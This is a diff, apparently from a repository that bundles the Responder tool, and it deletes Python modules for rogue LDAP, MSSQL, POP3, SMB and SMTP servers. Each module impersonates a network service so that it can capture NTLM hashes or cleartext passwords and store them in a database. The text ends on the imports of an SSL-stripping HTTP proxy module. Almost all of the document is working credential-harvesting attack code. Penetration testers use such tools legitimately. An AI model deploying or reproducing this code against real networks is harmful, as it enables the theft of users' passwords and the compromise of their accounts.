server = ThreadingTCPServer(('', 389), LDAPServer)
t = threading.Thread(name='LDAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LDAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
def ParseSearch(data):
Search1 = re.search('(objectClass)', data)
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
if Search1:
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
if Search2:
return str(LDAPSearchSupportedCapabilitiesPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
if Search3:
return str(LDAPSearchSupportedMechanismsPacket(MessageIDASNStr=data[8:9],MessageIDASN2Str=data[8:9]))
def ParseLDAPHash(data, client):
SSPIStart = data[42:]
LMhashLen = struct.unpack('<H',data[54:56])[0]
if LMhashLen > 10:
LMhashOffset = struct.unpack('<H',data[58:60])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[64:66])[0]
NthashOffset = struct.unpack('<H',data[66:68])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[72:74])[0]
DomainOffset = struct.unpack('<H',data[74:76])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[80:82])[0]
UserOffset = struct.unpack('<H',data[82:84])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+settings.Config.NumChal
SaveToDb({
'module': 'LDAP',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': NtHash,
'fullhash': WriteHash,
})
if LMhashLen < 2 and settings.Config.Verbose:
settings.Config.ResponderLogger.info("[LDAP] Ignoring anonymous NTLM authentication")
def ParseNTLM(data,client):
Search1 = re.search('(NTLMSSP\x00\x01\x00\x00\x00)', data)
Search2 = re.search('(NTLMSSP\x00\x03\x00\x00\x00)', data)
if Search1:
NTLMChall = LDAPNTLMChallenge(MessageIDASNStr=data[8:9],NTLMSSPNtServerChallenge=settings.Config.Challenge)
NTLMChall.calculate()
return str(NTLMChall)
if Search2:
ParseLDAPHash(data,client)
def ParseLDAPPacket(data, client):
if data[1:2] == '\x84':
PacketLen = struct.unpack('>i',data[2:6])[0]
MessageSequence = struct.unpack('<b',data[8:9])[0]
Operation = data[9:10]
sasl = data[20:21]
OperationHeadLen = struct.unpack('>i',data[11:15])[0]
LDAPVersion = struct.unpack('<b',data[17:18])[0]
if Operation == "\x60":
UserDomainLen = struct.unpack('<b',data[19:20])[0]
UserDomain = data[20:20+UserDomainLen]
AuthHeaderType = data[20+UserDomainLen:20+UserDomainLen+1]
if AuthHeaderType == "\x80":
PassLen = struct.unpack('<b',data[20+UserDomainLen+1:20+UserDomainLen+2])[0]
Password = data[20+UserDomainLen+2:20+UserDomainLen+2+PassLen]
SaveToDb({
'module': 'LDAP',
'type': 'Cleartext',
'client': client,
'user': UserDomain,
'cleartext': Password,
'fullhash': UserDomain+':'+Password,
})
if sasl == "\xA3":
Buffer = ParseNTLM(data,client)
return Buffer
elif Operation == "\x63":
Buffer = ParseSearch(data)
return Buffer
else:
if settings.Config.Verbose:
settings.Config.ResponderLogger.info('[LDAP] Operation not supported')
# LDAP Server class
class LDAPServer(BaseRequestHandler):
def handle(self):
try:
while True:
self.request.settimeout(0.5)
data = self.request.recv(8092)
Buffer = ParseLDAPPacket(data,self.client_address[0])
if Buffer:
self.request.send(Buffer)
except socket.timeout:
pass

View file

@ -1,186 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import MSSQLPreLoginAnswer, MSSQLNTLMChallengeAnswer
from core.responder.utils import *
class MSSQL:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 1433), MSSQLServer)
else:
server = ThreadingTCPServer(('', 1433), MSSQLServer)
t = threading.Thread(name='MSSQL', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MSSQL server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class TDS_Login_Packet():
def __init__(self, data):
ClientNameOff = struct.unpack('<h', data[44:46])[0]
ClientNameLen = struct.unpack('<h', data[46:48])[0]
UserNameOff = struct.unpack('<h', data[48:50])[0]
UserNameLen = struct.unpack('<h', data[50:52])[0]
PasswordOff = struct.unpack('<h', data[52:54])[0]
PasswordLen = struct.unpack('<h', data[54:56])[0]
AppNameOff = struct.unpack('<h', data[56:58])[0]
AppNameLen = struct.unpack('<h', data[58:60])[0]
ServerNameOff = struct.unpack('<h', data[60:62])[0]
ServerNameLen = struct.unpack('<h', data[62:64])[0]
Unknown1Off = struct.unpack('<h', data[64:66])[0]
Unknown1Len = struct.unpack('<h', data[66:68])[0]
LibraryNameOff = struct.unpack('<h', data[68:70])[0]
LibraryNameLen = struct.unpack('<h', data[70:72])[0]
LocaleOff = struct.unpack('<h', data[72:74])[0]
LocaleLen = struct.unpack('<h', data[74:76])[0]
DatabaseNameOff = struct.unpack('<h', data[76:78])[0]
DatabaseNameLen = struct.unpack('<h', data[78:80])[0]
self.ClientName = data[8+ClientNameOff:8+ClientNameOff+ClientNameLen*2].replace('\x00', '')
self.UserName = data[8+UserNameOff:8+UserNameOff+UserNameLen*2].replace('\x00', '')
self.Password = data[8+PasswordOff:8+PasswordOff+PasswordLen*2].replace('\x00', '')
self.AppName = data[8+AppNameOff:8+AppNameOff+AppNameLen*2].replace('\x00', '')
self.ServerName = data[8+ServerNameOff:8+ServerNameOff+ServerNameLen*2].replace('\x00', '')
self.Unknown1 = data[8+Unknown1Off:8+Unknown1Off+Unknown1Len*2].replace('\x00', '')
self.LibraryName = data[8+LibraryNameOff:8+LibraryNameOff+LibraryNameLen*2].replace('\x00', '')
self.Locale = data[8+LocaleOff:8+LocaleOff+LocaleLen*2].replace('\x00', '')
self.DatabaseName = data[8+DatabaseNameOff:8+DatabaseNameOff+DatabaseNameLen*2].replace('\x00', '')
def ParseSQLHash(data, client):
SSPIStart = data[8:]
LMhashLen = struct.unpack('<H',data[20:22])[0]
LMhashOffset = struct.unpack('<H',data[24:26])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[30:32])[0]
NthashOffset = struct.unpack('<H',data[32:34])[0]
NtHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[36:38])[0]
DomainOffset = struct.unpack('<H',data[40:42])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[44:46])[0]
UserOffset = struct.unpack('<H',data[48:50])[0]
User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, LMHash, NTHash, settings.Config.NumChal)
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'MSSQL',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def ParseSqlClearTxtPwd(Pwd):
Pwd = map(ord,Pwd.replace('\xa5',''))
Pw = []
for x in Pwd:
Pw.append(hex(x ^ 0xa5)[::-1][:2].replace("x","0").decode('hex'))
return ''.join(Pw)
def ParseClearTextSQLPass(data, client):
TDS = TDS_Login_Packet(data)
SaveToDb({
'module': 'MSSQL',
'type': 'Cleartext',
'client': client,
'hostname': "%s (%s)" % (TDS.ServerName, TDS.DatabaseName),
'user': TDS.UserName,
'cleartext': ParseSqlClearTxtPwd(TDS.Password),
'fullhash': TDS.UserName +':'+ ParseSqlClearTxtPwd(TDS.Password),
})
# MSSQL Server class
class MSSQLServer(BaseRequestHandler):
def handle(self):
if settings.Config.Verbose:
settings.Config.ResponderLogger.info("[MSSQL] Received connection from %s" % self.client_address[0])
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(0.1)
# Pre-Login Message
if data[0] == "\x12":
Buffer = str(MSSQLPreLoginAnswer())
self.request.send(Buffer)
data = self.request.recv(1024)
# NegoSSP
if data[0] == "\x10":
if re.search("NTLMSSP",data):
Packet = MSSQLNTLMChallengeAnswer(ServerChallenge=settings.Config.Challenge)
Packet.calculate()
Buffer = str(Packet)
self.request.send(Buffer)
data = self.request.recv(1024)
else:
ParseClearTextSQLPass(data,self.client_address[0])
# NegoSSP Auth
if data[0] == "\x11":
ParseSQLHash(data,self.client_address[0])
except socket.timeout:
pass
self.request.close()

View file

@ -1,90 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from traceback import print_exc
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import POPOKPacket
class POP3:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 110), POP3Server)
else:
server = ThreadingTCPServer(('', 110), POP3Server)
t = threading.Thread(name='POP3', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting POP3 server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# POP3 Server class
class POP3Server(BaseRequestHandler):
def SendPacketAndRead(self):
Packet = POPOKPacket()
self.request.send(str(Packet))
data = self.request.recv(1024)
return data
def handle(self):
try:
data = self.SendPacketAndRead()
if data[0:4] == "USER":
User = data[5:].replace("\r\n","")
data = self.SendPacketAndRead()
if data[0:4] == "PASS":
Pass = data[5:].replace("\r\n","")
SaveToDb({
'module': 'POP3',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+":"+Pass,
})
data = self.SendPacketAndRead()
else:
data = self.SendPacketAndRead()
except Exception:
pass

View file

@ -1,433 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import threading
import socket
from random import randrange
from core.responder.packets import SMBHeader, SMBNegoAnsLM, SMBNegoAns, SMBNegoKerbAns, SMBSession1Data, SMBSession2Accept, SMBSessEmpty, SMBTreeData
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.utils import *
class SMB:
def start(self):
try:
#if OsInterfaceIsSupported():
# server1 = ThreadingTCPServer((settings.Config.Bind_To, 445), SMB1)
# server2 = ThreadingTCPServer((settings.Config.Bind_To, 139), SMB1)
#else:
server1 = ThreadingTCPServer(('0.0.0.0', 445), SMB1)
server2 = ThreadingTCPServer(('0.0.0.0', 139), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMB', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Detect if SMB auth was Anonymous
def Is_Anonymous(data):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
if SecBlobLen < 260:
LMhashLen = struct.unpack('<H',data[89:91])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
if SecBlobLen > 260:
LMhashLen = struct.unpack('<H',data[93:95])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
def Is_LMNT_Anonymous(data):
LMhashLen = struct.unpack('<H',data[51:53])[0]
return True if LMhashLen == 0 or LMhashLen == 1 else False
#Function used to know which dialect number to return for NT LM 0.12
def Parse_Nego_Dialect(data):
packet = data
try:
Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
if Dialect[0] == "NT LM 0.12":
return "\x00\x00"
if Dialect[1] == "NT LM 0.12":
return "\x01\x00"
if Dialect[2] == "NT LM 0.12":
return "\x02\x00"
if Dialect[3] == "NT LM 0.12":
return "\x03\x00"
if Dialect[4] == "NT LM 0.12":
return "\x04\x00"
if Dialect[5] == "NT LM 0.12":
return "\x05\x00"
if Dialect[6] == "NT LM 0.12":
return "\x06\x00"
if Dialect[7] == "NT LM 0.12":
return "\x07\x00"
if Dialect[8] == "NT LM 0.12":
return "\x08\x00"
if Dialect[9] == "NT LM 0.12":
return "\x09\x00"
if Dialect[10] == "NT LM 0.12":
return "\x0a\x00"
if Dialect[11] == "NT LM 0.12":
return "\x0b\x00"
if Dialect[12] == "NT LM 0.12":
return "\x0c\x00"
if Dialect[13] == "NT LM 0.12":
return "\x0d\x00"
if Dialect[14] == "NT LM 0.12":
return "\x0e\x00"
if Dialect[15] == "NT LM 0.12":
return "\x0f\x00"
except Exception:
print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
print hexdump(packet)
#Set MID SMB Header field.
def midcalc(data):
pack=data[34:36]
return pack
#Set UID SMB Header field.
def uidcalc(data):
pack=data[32:34]
return pack
#Set PID SMB Header field.
def pidcalc(data):
pack=data[30:32]
return pack
#Set TID SMB Header field.
def tidcalc(data):
pack=data[28:30]
return pack
def ParseShare(data):
packet = data[:]
a = re.search('(\\x5c\\x00\\x5c.*.\\x00\\x00\\x00)', packet)
if a:
settings.Config.ResponderLogger.info("[SMB] Requested Share : %s" % a.group(0).replace('\x00', ''))
#Parse SMB NTLMSSP v1/v2
def ParseSMBHash(data,client):
SecBlobLen = struct.unpack('<H',data[51:53])[0]
BccLen = struct.unpack('<H',data[61:63])[0]
if SecBlobLen < 260:
SSPIStart = data[75:]
LMhashLen = struct.unpack('<H',data[89:91])[0]
LMhashOffset = struct.unpack('<H',data[91:93])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[97:99])[0]
NthashOffset = struct.unpack('<H',data[99:101])[0]
else:
SSPIStart = data[79:]
LMhashLen = struct.unpack('<H',data[93:95])[0]
LMhashOffset = struct.unpack('<H',data[95:97])[0]
LMHash = SSPIStart[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[101:103])[0]
NthashOffset = struct.unpack('<H',data[103:105])[0]
if NthashLen == 24:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[105:107])[0]
DomainOffset = struct.unpack('<H',data[107:109])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[113:115])[0]
UserOffset = struct.unpack('<H',data[115:117])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LMHash, SMBHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
if NthashLen > 60:
SMBHash = SSPIStart[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
DomainLen = struct.unpack('<H',data[109:111])[0]
DomainOffset = struct.unpack('<H',data[111:113])[0]
Domain = SSPIStart[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
UserLen = struct.unpack('<H',data[117:119])[0]
UserOffset = struct.unpack('<H',data[119:121])[0]
Username = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, SMBHash[:32], SMBHash[32:])
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2-SSP',
'client': client,
'user': Domain+'\\'+Username,
'hash': SMBHash,
'fullhash': WriteHash,
})
# Parse SMB NTLMv1/v2
def ParseLMNTHash(data, client):
LMhashLen = struct.unpack('<H',data[51:53])[0]
NthashLen = struct.unpack('<H',data[53:55])[0]
Bcc = struct.unpack('<H',data[63:65])[0]
Username, Domain = tuple([e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]])
if NthashLen > 25:
FullHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex')
LmHash = FullHash[:32].upper()
NtHash = FullHash[32:].upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, settings.Config.NumChal, LmHash, NtHash)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv2',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
if NthashLen == 24:
NtHash = data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()
LmHash = data[65:65+LMhashLen].encode('hex').upper()
WriteHash = '%s::%s:%s:%s:%s' % (Username, Domain, LmHash, NtHash, settings.Config.NumChal)
SaveToDb({
'module': 'SMB',
'type': 'NTLMv1',
'client': client,
'user': Domain+'\\'+Username,
'hash': NtHash,
'fullhash': WriteHash,
})
def IsNT4ClearTxt(data, client):
HeadLen = 36
if data[14:16] == "\x03\x80":
SmbData = data[HeadLen+14:]
WordCount = data[HeadLen]
ChainedCmdOffset = data[HeadLen+1]
if ChainedCmdOffset == "\x75":
PassLen = struct.unpack('<H',data[HeadLen+15:HeadLen+17])[0]
if PassLen > 2:
Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","")
User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","")
settings.Config.ResponderLogger.info("[SMB] Clear Text Credentials: %s:%s" % (User,Password))
WriteData(settings.Config.SMBClearLog % client, User+":"+Password, User+":"+Password)
# SMB Server class, NTLMSSP
class SMB1(BaseRequestHandler):
def handle(self):
try:
while True:
data = self.request.recv(1024)
self.request.settimeout(1)
if len(data) < 1:
break
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
try:
self.request.send(Buffer)
data = self.request.recv(1024)
except:
pass
# Negociate Protocol Response
if data[8:10] == "\x72\x00":
# \x72 == Negociate Protocol Response
Header = SMBHeader(cmd="\x72",flag1="\x88", flag2="\x01\xc8", pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoKerbAns(Dialect=Parse_Nego_Dialect(data))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Session Setup AndX Request
if data[8:10] == "\x73\x00":
IsNT4ClearTxt(data, self.client_address[0])
# STATUS_MORE_PROCESSING_REQUIRED
Header = SMBHeader(cmd="\x73",flag1="\x88", flag2="\x01\xc8", errorcode="\x16\x00\x00\xc0", uid=chr(randrange(256))+chr(randrange(256)),pid=pidcalc(data),tid="\x00\x00",mid=midcalc(data))
Body = SMBSession1Data(NTLMSSPNtServerChallenge=settings.Config.Challenge)
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(4096)
# STATUS_SUCCESS
if data[8:10] == "\x73\x00":
if Is_Anonymous(data):
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid="\x00\x00",uid=uidcalc(data),mid=midcalc(data))###should always send errorcode="\x72\x00\x00\xc0" account disabled for anonymous logins.
Body = SMBSessEmpty()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
# Parse NTLMSSP_AUTH packet
ParseSMBHash(data,self.client_address[0])
# Send STATUS_SUCCESS
Header = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = SMBSession2Accept()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
# Tree Connect AndX Request
if data[8:10] == "\x75\x00":
ParseShare(data)
# Tree Connect AndX Response
Header = SMBHeader(cmd="\x75",flag1="\x88", flag2="\x01\xc8", errorcode="\x00\x00\x00\x00", pid=pidcalc(data), tid=chr(randrange(256))+chr(randrange(256)), uid=uidcalc(data), mid=midcalc(data))
Body = SMBTreeData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Tree Disconnect.
if data[8:10] == "\x71\x00":
Header = SMBHeader(cmd="\x71",flag1="\x98", flag2="\x07\xc8", errorcode="\x00\x00\x00\x00",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##NT_CREATE Access Denied.
if data[8:10] == "\xa2\x00":
Header = SMBHeader(cmd="\xa2",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Trans2 Access Denied.
if data[8:10] == "\x25\x00":
Header = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##LogOff.
if data[8:10] == "\x74\x00":
Header = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Body = "\x02\xff\x00\x27\x00\x00\x00"
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except socket.timeout:
pass
# SMB Server class, old version
class SMB1LM(BaseRequestHandler):
def handle(self):
try:
self.request.settimeout(0.5)
data = self.request.recv(1024)
##session request 139
if data[0] == "\x81":
Buffer = "\x82\x00\x00\x00"
self.request.send(Buffer)
data = self.request.recv(1024)
##Negotiate proto answer.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
Body = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=settings.Config.Challenge)
Body.calculate()
Packet = str(head)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
##Session Setup AndX Request
if data[8:10] == "\x73\x00":
if Is_LMNT_Anonymous(data):
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
else:
ParseLMNTHash(data,self.client_address[0])
head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
Packet = str(head)+str(SMBSessEmpty())
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
self.request.send(Buffer)
data = self.request.recv(1024)
except Exception:
self.request.close()
pass

View file

@ -1,98 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import core.responder.settings as settings
import threading
from core.responder.utils import *
from base64 import b64decode, b64encode
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import SMTPGreeting, SMTPAUTH, SMTPAUTH1, SMTPAUTH2
class SMTP:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 25), ESMTP)
server2 = ThreadingTCPServer((settings.Config.Bind_To, 587), ESMTP)
else:
server1 = ThreadingTCPServer(('', 25), SMB1)
server2 = ThreadingTCPServer(('', 587), SMB1)
for server in [server1, server2]:
t = threading.Thread(name='SMTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMTP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# ESMTP Server class
class ESMTP(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(SMTPGreeting()))
data = self.request.recv(1024)
if data[0:4] == "EHLO":
self.request.send(str(SMTPAUTH()))
data = self.request.recv(1024)
if data[0:4] == "AUTH":
self.request.send(str(SMTPAUTH1()))
data = self.request.recv(1024)
if data:
try:
User = filter(None, b64decode(data).split('\x00'))
Username = User[0]
Password = User[1]
except:
Username = b64decode(data)
self.request.send(str(SMTPAUTH2()))
data = self.request.recv(1024)
if data:
try: Password = b64decode(data)
except: Password = data
SaveToDb({
'module': 'SMTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Username,
'cleartext': Password,
'fullhash': Username+":"+Password,
})
except Exception:
pass

View file

@ -1,246 +0,0 @@
# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import urlparse
import logging
import os
import sys
import random
import re
import dns.resolver
from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient
from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory
from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache
from core.logger import logger
